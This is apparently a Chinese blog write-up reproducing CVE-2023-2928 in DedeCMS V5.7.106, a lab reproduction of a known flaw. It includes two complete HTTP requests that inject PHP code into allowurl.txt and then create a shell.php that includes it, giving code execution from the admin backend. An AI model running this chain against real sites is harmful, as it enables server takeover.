【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)

我会带着你远行 2024-03-16 11:36 21阅读 0赞

*  复现环境下载  
    https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.106-UTF8.zip
 *  影响版本  
    DedeCMS V5.7.106  
    CNVD编号：CNVD-2023-40504
 *  漏洞分析  
    漏洞文件: `uploads/dede/article_allowurl_edit.php`存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一，在`5.7.106`之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件`uploads/dede/article_allowurl_edit.php`的未知功能。操纵参数`allurls`会导致代码注入。可以远程发起攻击获得网站控制权限。

把下载好的文件解压到刚刚网站创建的目录,访问创建的网站进行安装。  
![在这里插入图片描述][2aac342906e54971951e4d2fff728532.png]  
继续下一步  
![在这里插入图片描述][95b16a4ff9724e2fbfb455b09bd3e286.png]  
![在这里插入图片描述][61da135a5305474495bd93f501401a11.png]  
安装完成之后,我们来进行一波代码分析,通过查找文件/dede/article\_allowurl\_edit.php发现未对文件内容做任何过滤,会把内容写入到:  
`/data/admin/allowurl.txt` 这个文件当中  
![在这里插入图片描述][e3fa84df46614bcdb1b00611a1337a0a.png]  
先登录网站后台访问此文件如下图所示:  
`/dede/article_allowurl_edit.php`  
![在这里插入图片描述][0b3abc4c8bab4effaa03a4938ca0c790.png]  
添加如下内容,在这个地方,dedecms安全过滤器通过文件创建被绕过,事实上,文件包含函数没有被过滤,因此它可以用于任意文件包含；  
![在这里插入图片描述][f46da0da547e49edbf57ef0b69334451.png]  
点击确定burp拦截到如下数据包

POST /dede/article_allowurl_edit.php HTTP/1.1
    Host: X.X.X.X
    Content-Length: 147
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.160.4
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://192.168.160.4/dede/article_allowurl_edit.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
    Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=1aiacudvg5ett0sie1hldrsirp; _csrf_name_f6248c53=b78d93a8fa8ca918ce43981d99fef4fe; _csrf_name_f6248c531BH21ANI1AGD297L1FF21LN02BGE1DNG=c1395807345a5866; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=ebfa2a04dd016f07; DedeLoginTime=1685497822; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=508a22baef9e1b61
    Connection: close
    
    dopost=save&allurls=www.dedecms.com%0D%0Awww.desdev.cn%0D%0Abbs.dedecms.com%0D%0A%3C%3Fphp+phpinfo%28%29%3B%3F%3E&imageField1.x=32&imageField1.y=20

![在这里插入图片描述][0e3cff4cc3034338b61f1513ae5a9678.png]  
![在这里插入图片描述][029a1b53f2604a11a942449b0f3007e8.png]  
保存成功。

回到文件中查看已经写入到txt中  
![在这里插入图片描述][908039c5127a481e971468eb21628a29.png]  
通过`/dede/file_manage_control.php`文件构造文件包含代码如下:

POST /dede/file_manage_control.php HTTP/1.1
    Host: X.X.X.X
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
    Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=1aiacudvg5ett0sie1hldrsirp; _csrf_name_f6248c53=b78d93a8fa8ca918ce43981d99fef4fe; _csrf_name_f6248c531BH21ANI1AGD297L1FF21LN02BGE1DNG=c1395807345a5866; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=ebfa2a04dd016f07; DedeLoginTime=1685497822; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=508a22baef9e1b61
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 139
    
    fmdo=edit&backurl=&token=&activepath=&filename=shell.php&str=<?php Include_once("./data/admin/allowurl.txt"); ?>&B1=++%E4%BF%9D+%E5%AD%98++

(此处请求数据包的功能点在`附件管理->文件式管理器-新建文件`)  
![在这里插入图片描述][76c6a40d34d5401187b63957ee993527.png]  
成功保存一个文件!!! 这时我们访问根目录下shell.php看下是否解析。  
![在这里插入图片描述][f63e245db5d9407bafd782b8c2d8993d.png]  
成功解析php文件!!!

感兴趣的小伙伴可以自行搭建测试环境本地测试。

[2aac342906e54971951e4d2fff728532.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/498538f9755643b798bf4135437873bc.png
[95b16a4ff9724e2fbfb455b09bd3e286.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/5ee81f8ff9ee49928cb24230c270dcf9.png
[61da135a5305474495bd93f501401a11.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/f8b1727439fd4abf88447ea5c1d0ea61.png
[e3fa84df46614bcdb1b00611a1337a0a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/f0aa0b9f93974e348cb6a59861d467a5.png
[0b3abc4c8bab4effaa03a4938ca0c790.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/e30ca14dae83431c8a2eeb100a9a63ca.png
[f46da0da547e49edbf57ef0b69334451.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/0da30b2055d9422f8442809b239f754b.png
[0e3cff4cc3034338b61f1513ae5a9678.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/136f58b5010f43c7bbc6f0f79c0717d2.png
[029a1b53f2604a11a942449b0f3007e8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/e05530887b24417c9c709eacf03986ac.png
[908039c5127a481e971468eb21628a29.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/cd5767b722b94f90afaa57fd9944fc1e.png
[76c6a40d34d5401187b63957ee993527.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/e3e29b47b42941f5b654242be57fe24a.png
[f63e245db5d9407bafd782b8c2d8993d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/16/2d951752214843e1bd7a4c7a5fb037f1.png